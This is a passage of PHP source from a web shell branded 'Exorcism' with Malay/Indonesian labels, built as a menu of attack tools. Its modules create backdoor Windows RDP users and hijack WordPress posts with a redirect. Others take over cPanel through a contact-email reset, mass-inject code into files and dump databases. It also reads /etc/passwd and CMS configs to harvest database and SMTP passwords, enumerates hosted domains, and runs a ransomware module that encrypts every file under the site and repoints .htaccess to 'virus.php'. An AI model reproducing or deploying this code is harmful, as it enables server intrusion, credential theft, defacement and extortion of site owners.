                    echo "[ <font color=lime>Sudah ada</font> ]<br>
                    echo "[ <font color=red>belum ada</font> ]";
            elseif ($_POST['opsi'] == '2')
                $cek = exe("net user $user Jaring1337");
                if (preg_match("/$user/", exe("net user")))
                    echo "[change password: <font color=lime>Jaring1337</font>] -> ";
                    if ($cek)
                        echo "<font color=lime>Berjaya</font>";
                        echo "<font color=red>Gagal</font>";
                    echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
            elseif ($_POST['opsi'] == '3')
                $cek = exe("net user $user /DELETE");
                if (preg_match("/$user/", exe("net user")))
                    echo "[remove user: <font color=lime>$user</font>] -> ";
                    if ($cek)
                        echo "<font color=lime>Berjaya</font>";
                        echo "<font color=red>Gagal</font>";
                    echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
            echo "<hr><br><center>";
            echo "<h2>RDP Shell</h2>";
            echo "-- Create RDP --<br>
            <form method='post'>
            <div class = 'row clearfix'>
            <div class = 'col-md-4'>
            <input class ='form-control' style = 'width:250px;height:40px;' type='text' name='user' placeholder='username' value='Jaring1337' required>
            <div class = 'col-md-4'>
            <input class ='form-control' style = 'width:250px;height:40px;' type='text' name='pass' placeholder='password' value='Jaring1337' required>
            <div class = 'col-md-4'>
            <input class ='form-control' style = 'width:250px;height:40px;' type='submit' name='create' value='Gass'>
            -- Option --<br>
            <form method='post'>
            <div class = 'row clearfix'>
            <div class = 'col-md-4'>
            <input class ='form-control' style = 'width:250px;height:40px;' type='text' name='r_user' placeholder='username' required>
            <div class = 'col-md-4'>
            <select name='opsi' class ='form-control' style = 'width:250px;height:40px;'>
            <option value='1'>Semak Username</option>
            <option value='2'>Tukar Password</option>
            <option value='3'>Padam Username</option>
            <div class = 'col-md-4'>
            <input type='submit' name='s_opsi' value='Cek' class ='form-control' style = 'width:250px;height:40px;'>
        echo "<font color=red>Ciri ini hanya dapat digunakan dalam Windows Server.</font>";
elseif (isset($_GET[hex('wp-hijack') ]))

    echo '<form method="POST">
<img border="0" src="http://www3.0zz0.com/2014/08/20/15/615506358.png">
<h2>Wordpress Hijack Index Shell</h2><br>
<div class = "row clearfix ml-5">
<div class= "col-md-2">
<input class="form-control" type="text" value="localhost" name="pghost">
<div class= "col-md-2">
<input class="form-control" type="text" value="database_name" name="dbnmn">
<div class= "col-md-2">
<input class="form-control" type="text" value="prefix" name="prefix">
<div class= "col-md-2">
<input class="form-control" type="text" value="username_db" name="dbusrrrr">
<div class= "col-md-2">
<input class="form-control" type="text" value="password_db" name="pwddbbn"></center><br>
<center><textarea class="form-control" name="pown" cols="85" rows="10"><meta http-equiv="refresh" content="0;URL=http://pastebin.com/raw.php?i=WG1zASMG"></textarea><br>
<input style="width:250px;height:40px;" class="form-control" type="submit" name="up2" value="Hijack Index"><br></center><form><hr><br>';
    $pghost = $_POST['pghost'];
    $dbnmn = $_POST['dbnmn'];
    $dbusrrrr = $_POST['dbusrrrr'];
    $pwddbbn = $_POST['pwddbbn'];
    $index = stripslashes($_POST['pown']);
    $prefix = $_POST['prefix'];
    //$prefix = "wp_";
    if ($_POST['up2'])
        @mysql_connect($pghost, $dbusrrrr, $pwddbbn) or die(mysql_error());
        @mysql_select_db($dbnmn) or die(mysql_error());
        $tableName = $prefix . "posts";
        $ghost1 = mysql_query("UPDATE $tableName SET post_title ='" . $index . "' WHERE ID > 0 ");
        if (!$ghost1)
            $ghost2 = mysql_query("UPDATE $tableName SET post_content ='" . $index . "' WHERE ID > 0 ");
        elseif (!$ghost2)
            $ghost3 = mysql_query("UPDATE $tableName SET post_name ='" . $index . "' WHERE ID > 0 ");
        if ($ghost1 || $ghost2 || $ghost3)
            echo "<center><p><b><font color='red'>Index Website Have been Hijacked Successfully</font></p></b></center>";
            echo "<center><p><b><font color='red'>Failed To Hijack the Website :(</font></p></b></center>";
elseif (isset($_GET[hex('cpanel-reset') ]))

    echo '
         <h2>Cpanel Reset Shell</h2>
  	    <form action="" method="post">
  	    <b> Email : </b>
  	<input type="email" name="email" class = "form-control" style = "width:250px; height:40px;" autocomplete="off"  />
  	<input type="submit" name="submit" value="Reset Password!" class = "form-control" style = "width:250px; height:40px;" />

    $user = get_current_user();
    $site = $_SERVER['HTTP_HOST'];
    $ips = getenv('REMOTE_ADDR');

    if (isset($_POST['submit']))

        $email = $_POST['email'];
        $wr = 'email:' . $email;
        $f = fopen('/home/' . $user . '/.cpanel/contactinfo', 'w');
        fwrite($f, $wr);
        $f = fopen('/home/' . $user . '/.contactinfo', 'w');
        fwrite($f, $wr);
        $parm = "Here : " . $site . ':2083/resetpass?start=1';
        echo '<br/><center>' . $parm . '</center>';
elseif (isset($_GET[hex('zip-menu') ]))

    $dir = path();
    echo "<center>";
    echo "<hr><br>";
    echo "<h2>Zip Menu</h2>";
    function rmdir_recursive($dir)
        foreach (scandir($dir) as $file)
            if ('.' === $file || '..' === $file) continue;
            if (is_dir("$dir/$file")) rmdir_recursive("$dir/$file");
            else unlink("$dir/$file");
    if ($_FILES["zip_file"]["name"])
        $filename = $_FILES["zip_file"]["name"];
        $source = $_FILES["zip_file"]["tmp_name"];
        $type = $_FILES["zip_file"]["type"];
        $name = explode(".", $filename);
        $accepted_types = array(
        foreach ($accepted_types as $mime_type)
            if ($mime_type == $type)
                $okay = true;
        $continue = strtolower($name[1]) == 'zip' ? true : false;
        if (!$continue)
            $message = "Not Zip  , ,Trouble";
        $path = dirname(__FILE__) . '/';
        $filenoext = basename($filename, '.zip');
        $filenoext = basename($filenoext, '.ZIP');
        $targetdir = $path . $filenoext;
        $targetzip = $path . $filename;
        if (is_dir($targetdir)) rmdir_recursive($targetdir);
        mkdir($targetdir, 0777);
        if (move_uploaded_file($source, $targetzip))
            $zip = new ZipArchive();
            $x = $zip->open($targetzip);
            if ($x === true)
            $message = "<b>You Succeed :)</b>";
            $message = "<b>You Fail :(</b>";
    echo '<table style="width:100%" border="1">
<form enctype="multipart/form-data" method="post" action="">
<label>Zip File : <input type="file" class="form-control" name="zip_file" /></label>
<input type="submit" class="form-control" style="width:250px;" name="submit" value="Upload And Unzip" />
    if ($message) echo "<p>$message</p>";
    echo "<h2>Zip Backup</h2>
<form action='' method='post'><font style='text-decoration: underline;'>Folder:</font><br>
<input class='form-control' type='text' name='dir' value='$dir' style='width: 450px;' height='10'><br><br>
<font style='text-decoration: underline;'>Save To:</font><br>
<input class='form-control' type='text' name='save' value='$dir/Exorcism_backup.zip' style='width: 450px;' height='10'><br><br>
<input class='form-control' type='submit' name='backup' class='kotak' value='Back Up!' style='width: 215px;'></form><br><br>";
    if ($_POST['backup'])
        $save = $_POST['save'];
        function Zip($source, $destination)
            if (extension_loaded('zip') === true)
                if (file_exists($source) === true)
                    $zip = new ZipArchive();
                    if ($zip->open($destination, ZIPARCHIVE::CREATE) === true)
                        $source = realpath($source);
                        if (is_dir($source) === true)
                            $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source) , RecursiveIteratorIterator::SELF_FIRST);
                            foreach ($files as $file)
                                $file = realpath($file);
                                if (is_dir($file) === true)
                                    $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
                                else if (is_file($file) === true)
                                    $zip->addFromString(str_replace($source . '/', '', $file) , file_get_contents($file));
                        else if (is_file($source) === true)
                            $zip->addFromString(basename($source) , file_get_contents($source));
                    return $zip->close();
            return false;
        Zip($_POST['dir'], $save);
        echo "Done , Save To <b>$save</b>";
    echo "
        <h2>Unzip Manual</h2>
    <form action='' method='post'><font style='text-decoration: underline;'>Zip Location:</font><br>
    <input class='form-control' type='text' name='dir' value='$dir/file.zip' style='width: 450px;' height='10'><br><br>
    <font style='text-decoration: underline;'>Save To:</font><br>
    <input class='form-control' type='text' name='save' value='$dir/Exorcism_unzip' style='width: 450px;' height='10'><br><br>
    <input class='form-control' type='submit' name='extrak' class='kotak' value='Unzip!' style='width: 215px;'></form><br><br>
    if ($_POST['extrak'])
        $save = $_POST['save'];
        $zip = new ZipArchive;
        $res = $zip->open($_POST['dir']);
        if ($res === true)
            echo 'Succes , Location : <b>' . $save . '</b>';
            echo 'Gagal Cok :( Ntahlah !';
    echo '</table><hr>';
elseif (isset($_GET[hex('reverse-ip') ]))

					<h2>Reverse IP Shell</h2>
					<a style="width: 250px;" class="form-control" onClick="window.open('http://www.viewdns.info/reverseip/?host=<?php echo $_SERVER['SERVER_ADDR']; ?>','POPUP','width=900 0,height=500,scrollbars=10');return false;" href="http://www.viewdns.info/reverseip/?host=<?php echo $_SERVER['SERVER_ADDR']; ?>">[ Reverse IP Lookup ] </a>
elseif (isset($_GET[hex('ransomware') ]))
    if (version_compare(PHP_VERSION, '7.2.0', '>'))

        echo '<br><br><font color = red>Tools Ransomware Ini Hanya boleh berjalan di PHP versi 7.2 ke bawah saja . untuk PHP versi 7.2 ke atas masih proses pembuatan </font> ';


					<link rel="icon" type="image/gif" href="https://defacerph.neocities.org/assets/img/logo.png">
					<link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'>
					<title> &#1203;&#824;&#1202;&#824;&#1203; Exorcism Tr0jan Ransomware &#1203;&#824;&#1202;&#824;&#1203;</title>
					<style type="text/css">
						.inpute {
							width: 500px;
							height: 20px;
							border-color: #EA2A14;
							color: lime;
							text-align: center;

						.selecte {
							border-color: lime;
							width: 300px;
							height: 30px;
							background-color: transparent;
							color: lime;

						.submite {
							width: 200px;
							border-color: #EA2A14;
							background-color: transparent;
							color: red;

						.item {
							background-color: black;

    ini_set('memory_limit', '-1');
    class deRanSomeware
        public function shcpackInstall()
            if (!file_exists(".htaencrypted"))
                rename(".htaccess", ".htaencrypted");
                if (fwrite(fopen('.htaccess', 'w') , "#Exorcism Ransomware\r\nDirectoryIndex virus.php\r\nErrorDocument 404 /virus.php"))
                    echo '<i class="fa fa-thumbs-o-up" aria-hidden="true"></i> .htaccess (Default Page)<br>';
                    echo '<i class="fa fa-thumbs-o-up" aria-hidden="true"></i>  virus.php (Default Page)<br>';
        public function shcpackUnstall()
            if (file_exists(".htaencrypted"))
                if (unlink(".htaccess") && unlink("virus.php"))
                    echo '<i class="fa fa-thumbs-o-down" aria-hidden="true"></i> .htaccess (Default Page)<br>';
                    echo '<i class="fa fa-thumbs-o-down" aria-hidden="true"></i> virus.php (Default Page)<br>';
                rename(".htaencrypted", ".htaccess");
        public function plus()
        public function locate()
            return getcwd();
        public function shcdirs($dir, $method, $key)
            switch ($method)
                case '1':
                case '2':
            foreach (scandir($dir) as $d)
                if ($d != '.' && $d != '..')
                    $locate = $dir . DIRECTORY_SEPARATOR . $d;
                    if (!is_dir($locate))
                        if (deRanSomeware::kecuali($locate, "idx.php") && deRanSomeware::kecuali($locate, ".htaccess") && deRanSomeware::kecuali($locate, "virus.php") && deRanSomeware::kecuali($locate, "index.php") && deRanSomeware::kecuali($locate, ".htaencrypted"))
                            switch ($method)
                                case '1':
                                    deRanSomeware::shcEnCry($key, $locate);
                                    deRanSomeware::shcEnDesDirS($locate, "1");
                                case '2':
                                    deRanSomeware::shcDeCry($key, $locate);
                                    deRanSomeware::shcEnDesDirS($locate, "2");
                        deRanSomeware::shcdirs($locate, $method, $key);

        public function shcEnDesDirS($locate, $method)
            switch ($method)
                case '1':
                    rename($locate, $locate . ".Exorcised");
                case '2':
                    $locates = str_replace(".Exorcised", "", $locate);
                    rename($locate, $locates);
        public function shcEnCry($key, $locate)
            $data = file_get_contents($locate);
            $iv = mcrypt_create_iv(mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC) , MCRYPT_DEV_URANDOM);
            $encrypted = base64_encode($iv . mcrypt_encrypt(MCRYPT_RIJNDAEL_128, hash('sha256', $key, true) , $data, MCRYPT_MODE_CBC, $iv));
            if (file_put_contents($locate, $encrypted))
                echo '<i class="fa fa-lock" aria-hidden="true"></i> <font color="#00BCD4">Locked</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">' . $locate . '</font> <br>';
                echo '<i class="fa fa-lock" aria-hidden="true"></i> <font color="#00BCD4">Locked</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font> ' . $locate . ' <br>';
        public function shcDeCry($key, $locate)
            $data = base64_decode(file_get_contents($locate));
            $iv = substr($data, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC));
            $decrypted = rtrim(mcrypt_decrypt(MCRYPT_RIJNDAEL_128, hash('sha256', $key, true) , substr($data, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)) , MCRYPT_MODE_CBC, $iv) , "\0");
            if (file_put_contents($locate, $decrypted))
                echo '<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B">Unlock</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">' . $locate . '</font> <br>';
                echo '<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B">Unlock</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font> <font color="#2196F3">' . $locate . '</font> <br>';
        public function kecuali($ext, $name)
            $re = "/({$name})/";
            preg_match($re, $ext, $matches);
            if ($matches[1])
                return false;
            return true;
    if ($_POST['submit'])
        switch ($_POST['method'])
            case '1':
                deRanSomeware::shcdirs(deRanSomeware::locate() , "1", $_POST['key']);
            case '2':
                deRanSomeware::shcdirs(deRanSomeware::locate() , "2", $_POST['key']);
						<div class="item">
<font color = "lime"><i>
 -[ Contact : jaringdf@gmail.com ]-
 System :  <?php echo php_uname() . "\n"; ?>
 Server : <?php $_SERVER['HTTP_HOST'] . "\n"; ?>
 #Ransomware Ini Berada Pada [dir]: <?php echo getcwd(); ?>/<?php $current_file_name = basename($_SERVER['PHP_SELF']);
        echo $current_file_name . "\n"; ?>

									<font color='red' face='iceland'> Put Your Encryption/Decryption Key Here

								<form action="" method="post" style=" text-align: center;">
									<input type="text" name="key" class="inpute" placeholder="KEY ENC/DEC"><br><br>
										<font color='lime' face='iceland'> Post Type :
									<select name="method" class="selecte">
										<option value="1">Encrypt Files!</option>
										<option value="2">Decrypt Files!</option>
									<input type="submit" name="submit" class="submite" value="Execute Virus!" />

    } ?>

elseif (isset($_GET[hex('whois') ]))

    $dir = path();
				<form method="post">
    function sws_domain_info($site)
        $getip = @file_get_contents("http://networktools.nl/whois/$site");
        $ip = @findit($getip, '<pre>', '</pre>');
        return $ip;
    function sws_net_info($site)
        $getip = @file_get_contents("http://networktools.nl/asinfo/$site");
        $ip = @findit($getip, '<pre>', '</pre>');
        return $ip;
    function sws_site_ser($site)
        $getip = @file_get_contents("http://networktools.nl/reverseip/$site");
        $ip = @findit($getip, '<pre>', '</pre>');
        return $ip;
    function sws_sup_dom($site)
        $getip = @file_get_contents("http://www.magic-net.info/dns-and-ip-tools.dnslookup?subd=" . $site . "&Search+subdomains=Find+subdomains");
        $ip = @findit($getip, '<strong>Nameservers found:</strong>', '<script type="text/javascript">');
        return $ip;
    function sws_port_scan($ip)
        $list_post = array(
        foreach ($list_post as $o_port)
            $connect = @fsockopen($ip, $o_port, $errno, $errstr, 5);
            if ($connect)
                echo " $ip : $o_port ??? <u style=\"color: white\">Open</u> <br /><br />";
    function findit($mytext, $starttag, $endtag)
        $posLeft = @stripos($mytext, $starttag) + strlen($starttag);
        $posRight = @stripos($mytext, $endtag, $posLeft + 1);
        return @substr($mytext, $posLeft, $posRight - $posLeft);
    echo '<br><br><center>';
    echo '
    <br /><hr>
	<div class="mybox">
	<h2>Whois Shell</h2>
	<form method="post"><table class="tabnet">
    <tr><td>Site to scan </td><td>:</td><td>
    <input type="text" name="site" size="50" style="color:black;background-color:#FFF" class="form-control" value="site.com" /> &nbsp <input class="form-control" type="submit" style="color:black;background-color:#FFF" name="scan" value="Scan !" /></td></tr>
    if (isset($_POST['scan']))
        $site = @htmlentities($_POST['site']);
        if (empty($site))
            die('<br /><br /> Not add IP .. !');
        $ip_port = @gethostbyname($site);
        echo "
   <br /><div class=\"sc2\">Scanning [ $site ip $ip_port ] ... </div>
   <div class=\"tit\"> <br /><br />|-------------- Port Server ------------------| <br /></div>
   <div class=\"ru\"> <br /><br /><pre>
        echo "" . sws_port_scan($ip_port) . " </pre></div> ";
        echo "<div class=\"tit\"><br /><br />|-------------- Domain Info ------------------| <br /> </div>
   <div class=\"ru\">
   <pre>" . sws_domain_info($site) . "</pre></div>";
        echo "
   <div class=\"tit\"> <br /><br />|-------------- Network Info ------------------| <br /></div>
   <div class=\"ru\">
   <pre>" . sws_net_info($site) . "</pre> </div>";
        echo "<div class=\"tit\"> <br /><br />|-------------- subdomains Server ------------------| <br /></div>
   <div class=\"ru\">
   <pre>" . sws_sup_dom($site) . "</pre> </div>";
        echo "<div class=\"tit\"> <br /><br />|-------------- Site Server ------------------| <br /></div>
   <div class=\"ru\">
   <pre>" . sws_site_ser($site) . "</pre> </div>
   <div class=\"tit\"> <br /><br />|-------------- END ------------------| <br /></div>";
    echo '</center>';
elseif (isset($_GET[hex('phpinfo') ]))

    echo "<hr><br><center>";
    echo "<h2>Server Php Info</h2>";
    echo phpinfo();
    echo "<hr><br></center>";
elseif (isset($_GET[hex('inject-code') ]))
    echo "<hr><br>";
    echo '<center><h2>Mass Code Injector Shell</h2></center>';

    if (stristr(php_uname() , "Windows"))
        $DS = "\\";
    else if (stristr(php_uname() , "Linux"))
        $DS = '/';
    function get_structure($path, $depth)
        global $DS;
        $res = array();
        if (in_array(0, $depth))
            $res[] = $path;
        if (in_array(1, $depth) or in_array(2, $depth) or in_array(3, $depth))
            $tmp1 = glob($path . $DS . '*', GLOB_ONLYDIR);
            if (in_array(1, $depth))
                $res = array_merge($res, $tmp1);
        if (in_array(2, $depth) or in_array(3, $depth))
            $tmp2 = array();
            foreach ($tmp1 as $t)
                $tp2 = glob($t . $DS . '*', GLOB_ONLYDIR);
                $tmp2 = array_merge($tmp2, $tp2);
            if (in_array(2, $depth))
                $res = array_merge($res, $tmp2);
        if (in_array(3, $depth))
            $tmp3 = array();
            foreach ($tmp2 as $t)
                $tp3 = glob($t . $DS . '*', GLOB_ONLYDIR);
                $tmp3 = array_merge($tmp3, $tp3);
            $res = array_merge($res, $tmp3);
        return $res;

    if (isset($_POST['submit']) && $_POST['submit'] == 'Inject')
        $name = $_POST['name'] ? $_POST['name'] : '*';
        $type = $_POST['type'] ? $_POST['type'] : 'html';
        $path = $_POST['path'] ? $_POST['path'] : getcwd();
        $code = $_POST['code'] ? $_POST['code'] : 'Localhost Malaysia';
        $mode = $_POST['mode'] ? $_POST['mode'] : 'a';
        $depth = sizeof($_POST['depth']) ? $_POST['depth'] : array(
        $dt = get_structure($path, $depth);
        foreach ($dt as $d)
            if ($mode == 'a')
                if (file_put_contents($d . $DS . $name . '.' . $type, $code, FILE_APPEND))
                    echo '<div><strong>' . $d . $DS . $name . '.' . $type . '</strong><span style="color:lime;"> was injected</span></div>';
                    echo '<div><span style="color:red;">failed to inject</span> <strong>' . $d . $DS . $name . '.' . $type . '</strong></div>';
                if (file_put_contents($d . $DS . $name . '.' . $type, $code))
                    echo '<div><strong>' . $d . $DS . $name . '.' . $type . '</strong><span style="color:lime;"> was injected</span></div>';
                    echo '<div><span style="color:red;">failed to inject</span> <strong>' . $d . $DS . $name . '.' . $type . '</strong></div>';
        echo '<form method="post" action="">
                <table align="center">
                        <td>Directory : </td>
                        <td><input class = "form-control" type = "text" class="box" name="path" value="' . getcwd() . '" size="50"/></td>
                        <td class="title">Mode : </td>
                            <select class = "form-control" style="width: 150px;" name="mode" class="box">
                                <option value="a">Apender</option>
                                <option value="w">Overwriter</option>
                        <td class="title">File Name & Type : </td>
                            <input class = "form-control" type="text" style="width: 100px;" name="name" value="*"/>&nbsp;&nbsp;
                            <select class = "form-control" style="width: 150px;" name="type" class="box">
                            <option value="html">HTML</option>
                            <option value="htm">HTM</option>
                            <option value="php" selected="selected">PHP</option>
                            <option value="asp">ASP</option>
                            <option value="aspx">ASPX</option>
                            <option value="xml">XML</option>
                            <option value="txt">TXT</option>
                        <td class="title">Code Inject Depth : </td>
                            <input type="checkbox" name="depth[]" value="0" checked="checked"/>&nbsp;0&nbsp;&nbsp;
                            <input type="checkbox" name="depth[]" value="1"/>&nbsp;1&nbsp;&nbsp;
                            <input type="checkbox" name="depth[]" value="2"/>&nbsp;2&nbsp;&nbsp;
                            <input type="checkbox" name="depth[]" value="3"/>&nbsp;3
                        <td colspan="2"><textarea class = "form-control" name="code" style= "width:100%"></textarea></td>
                        <td colspan="2" style="text-align: center;">
                            <input type="hidden" name="a" value="Injector">
                            <input type="hidden" name="c" value="' . htmlspecialchars($GLOBALS['cwd']) . '">
                            <input type="hidden" name="p1">
                            <input type="hidden" name="p2">
                            <input type="hidden" name="charset" value="' . (isset($_POST['charset']) ? $_POST['charset'] : '') . '">
                            <input class = "form-control" style="padding :5px; width:100px;" name="submit" type="submit" value="Inject"/></td>
    echo "<hr><br>";
elseif (isset($_GET[hex('db-dump') ]))
    echo '
<form action method=post>
<table width=371 class=tabnet >
<h2>Database Dumper Shell</h2>
	<td>Server </td>
	<td><input class="form-control" type=text name=server size=52 autocomplete = "off"></td></tr><tr>
	<td><input class="form-control" type=text name=username size=52 autocomplete = "off"></td></tr><tr>
	<td><input class="form-control" type=text name=password size=52 autocomplete = "off"></td></tr><tr>
	<td>DataBase Name</td>
	<td><input class="form-control" type=text name=dbname size=52 autocomplete = "off"></td></tr>
	<td>DB Type </td>
	<td><form method=post action="' . $me . '">
	<select class="form-control" name=method>
		<option  value="gzip">Gzip</option>
		<option value="sql">Sql</option>
	<input class="form-control" type=submit value="  Dump!  " ></td></tr>
    if ($_POST['username'] && $_POST['dbname'] && $_POST['method'])
        $date = date("Y-m-d");
        $dbserver = $_POST['server'];
        $dbuser = $_POST['username'];
        $dbpass = $_POST['password'];
        $dbname = $_POST['dbname'];
        $file = "Dump-$dbname-$date";
        $method = $_POST['method'];
        if ($method == 'sql')
            $file = "Dump-$dbname-$date.sql";
            $fp = fopen($file, "w");
            $file = "Dump-$dbname-$date.sql.gz";
            $fp = gzopen($file, "w");
        function write($data)
            global $fp;
            if ($_POST['method'] == 'ssql')
                fwrite($fp, $data);
                gzwrite($fp, $data);
        mysql_connect($dbserver, $dbuser, $dbpass);
        $tables = mysql_query("SHOW TABLES");
        while ($i = mysql_fetch_array($tables))
            $i = $i['Tables_in_' . $dbname];
            $create = mysql_fetch_array(mysql_query("SHOW CREATE TABLE " . $i));
            write($create['Create Table'] . ";nn");
            $sql = mysql_query("SELECT * FROM " . $i);
            if (mysql_num_rows($sql))
                while ($row = mysql_fetch_row($sql))
                    foreach ($row as $j => $k)
                        $row[$j] = "'" . mysql_escape_string($k) . "'";
                    write("INSERT INTO $i VALUES(" . implode(",", $row) . ");n");
        if ($method == 'ssql')
        header("Content-Disposition: attachment; filename=" . $file);
        header("Content-Type: application/download");
        header("Content-Length: " . filesize($file));

        $fp = fopen($file, "r");
        while (!feof($fp))
            echo fread($fp, 65536);
elseif (isset($_GET[hex('cp-crack') ]))

    if ($_POST['crack'])
        $usercp = explode("\r\n", $_POST['user_cp']);
        $passcp = explode("\r\n", $_POST['pass_cp']);
        $i = 0;
        foreach ($usercp as $ucp)
            foreach ($passcp as $pcp)
                if (@mysql_connect('localhost', $ucp, $pcp))
                    if ($_SESSION[$ucp] && $_SESSION[$pcp])
                        $_SESSION[$ucp] = "1";
                        $_SESSION[$pcp] = "1";
                        if ($ucp == '' || $pcp == '')
                            if (function_exists('posix_getpwuid'))
                                $domain_cp = file_get_contents("/etc/named.conf");
                                if ($domain_cp == '')
                                    $dom = "<font color=red>gabisa ambil nama domain nya</font>";
                                    preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
                                    foreach ($domains_cp[1] as $dj)
                                        $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
                                        $user_cp_url = $user_cp_url['name'];
                                        if ($user_cp_url == $ucp)
                                            $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
                                $dom = "<font color=red>function is Disable by system</font>";
                            echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
        if ($i == 0)
            echo "<br>Berjaya " . $i . " Cpanel by <font color=lime>Exc Shell.</font>";
        echo "<center><hr><br>
		<form method='post'>
		<h2>Cpanel Crack Shell</h2>
		USER: <br>
		<textarea class = 'form-control' style='width: 450px; height: 150px;' name='user_cp'>";
        $_usercp = fopen("/etc/passwd", "r");
        while ($getu = fgets($_usercp))
            if ($getu == '' || !$_usercp)
                echo "<font color=red>Can't read /etc/passwd</font>";
                preg_match_all("/(.*?):x:/", $getu, $u);
                foreach ($u[1] as $user_cp)
                    if (is_dir("/home/$user_cp/public_html"))
                        echo "$user_cp\n";
        echo "</textarea><br>
		PASS: <br>
		<textarea class= 'form-control' style='width: 450px; height: 200px;' name='pass_cp'>";
        function cp_pass($dir)
            $pass = "";
            $dira = scandir($dir);
            foreach ($dira as $dirb)
                if (!is_file("$dir/$dirb")) continue;
                $ambil = file_get_contents("$dir/$dirb");
                if (preg_match("/WordPress/", $ambil))
                    $pass .= ambilkata($ambil, "DB_PASSWORD', '", "'") . "\n";
                elseif (preg_match("/JConfig|joomla/", $ambil))
                    $pass .= ambilkata($ambil, "password = '", "'") . "\n";
                elseif (preg_match("/Magento|Mage_Core/", $ambil))
                    $pass .= ambilkata($ambil, "<password><![CDATA[", "]]></password>") . "\n";
                elseif (preg_match("/panggil fungsi validasi xss dan injection/", $ambil))
                    $pass .= ambilkata($ambil, 'password = "', '"') . "\n";
                elseif (preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil))
                    $pass .= ambilkata($ambil, "'DB_PASSWORD', '", "'") . "\n";
                elseif (preg_match("/client/", $ambil))
                    preg_match("/password=(.*)/", $ambil, $pass1);
                    $pass .= $pass1[1] . "\n";
                    if (preg_match('/"/', $pass1[1]))
                        $pass1[1] = str_replace('"', "", $pass1[1]);
                        $pass .= $pass1[1] . "\n";
                elseif (preg_match("/cc_encryption_hash/", $ambil))
                    $pass .= ambilkata($ambil, "db_password = '", "'") . "\n";
            echo $pass;
        $cp_pass = cp_pass($dir);
        echo $cp_pass;
        echo "</textarea><br>
		<input class = 'form-control' type='submit' name='crack' style='width: 450px;' value='Crack'>
		<span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center><hr><br>";
elseif (isset($_GET[hex('smtp-grab') ]))
    $dir = path();
    echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
    function scj($dir)
        $dira = scandir($dir);
        foreach ($dira as $dirb)
            if (!is_file("$dir/$dirb")) continue;
            $ambil = file_get_contents("$dir/$dirb");
            $ambil = str_replace("$", "", $ambil);
            if (preg_match("/JConfig|joomla/", $ambil))
                $smtp_host = ambilkata($ambil, "smtphost = '", "'");
                $smtp_auth = ambilkata($ambil, "smtpauth = '", "'");
                $smtp_user = ambilkata($ambil, "smtpuser = '", "'");
                $smtp_pass = ambilkata($ambil, "smtppass = '", "'");
                $smtp_port = ambilkata($ambil, "smtpport = '", "'");
                $smtp_secure = ambilkata($ambil, "smtpsecure = '", "'");
                echo "<center>";
                echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
                echo "SMTP port: <font color=lime>$smtp_port</font><br>";
                echo "SMTP user: <font color=lime>$smtp_user</font><br>";
                echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
                echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
                echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
                echo "</center>";
    $smpt_hunter = scj($dir);
    echo $smpt_hunter;
elseif (isset($_GET[hex('domains') ]))

    echo "<center>
		<div class='mybox'>
		<p align='center' class='cgx2'>Domains and Users</p>";
    $d0mains = @file("/etc/named.conf");
    if (!$d0mains)
        die("<center>Error : can't read [ /etc/named.conf ]</center>");
    echo '<table id="output"><tr bgcolor=#cecece><td>Domains</td><td>users</td></tr>';
    foreach ($d0mains as $d0main)
        if (eregi("zone", $d0main))
            preg_match_all('#zone "(.*)"#', $d0main, $domains);
            if (strlen(trim($domains[1][0])) > 2)
                $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domains[1][0]));
                echo "<tr><td><a href=http://www." . $domains[1][0] . "/>" . $domains[1][0] . "</a></td><td>" . $user['name'] . "</td></tr>";
    echo '</div></center>';
elseif (isset($_GET[hex('whmcs-decoder') ]))

    echo '<form action="" method="post">';

    function decrypt($string, $cc_encryption_hash)
        $key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash);
        $hash_key = _hash($key);
        $hash_length = strlen($hash_key);
        $string = base64_decode($string);
        $tmp_iv = substr($string, 0, $hash_length);
        $string = substr($string, $hash_length, strlen($string) - $hash_length);
        $iv = $out = '';
        $c = 0;
        while ($c < $hash_length)
            $iv .= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c]));
        $key = $iv;
        $c = 0;
        while ($c < strlen($string))
            if (($c != 0 and $c % $hash_length == 0))
                $key = _hash($key . substr($out, $c - $hash_length, $hash_length));
            $out .= chr(ord($key[$c % $hash_length]) ^ ord($string[$c]));
        return $out;

    function _hash($string)
        if (function_exists('sha1'))
            $hash = sha1($string);
            $hash = md5($string);
        $out = '';
        $c = 0;
        while ($c < strlen($hash))
            $out .= chr(hexdec($hash[$c] . $hash[$c + 1]));
            $c += 2;
        return $out;

    echo "
<br><center><h2>Whmcs Decoder Shell</h2></center>


<FORM action=''  method='post'>
<input type='hidden' name='form_action' value='2'>
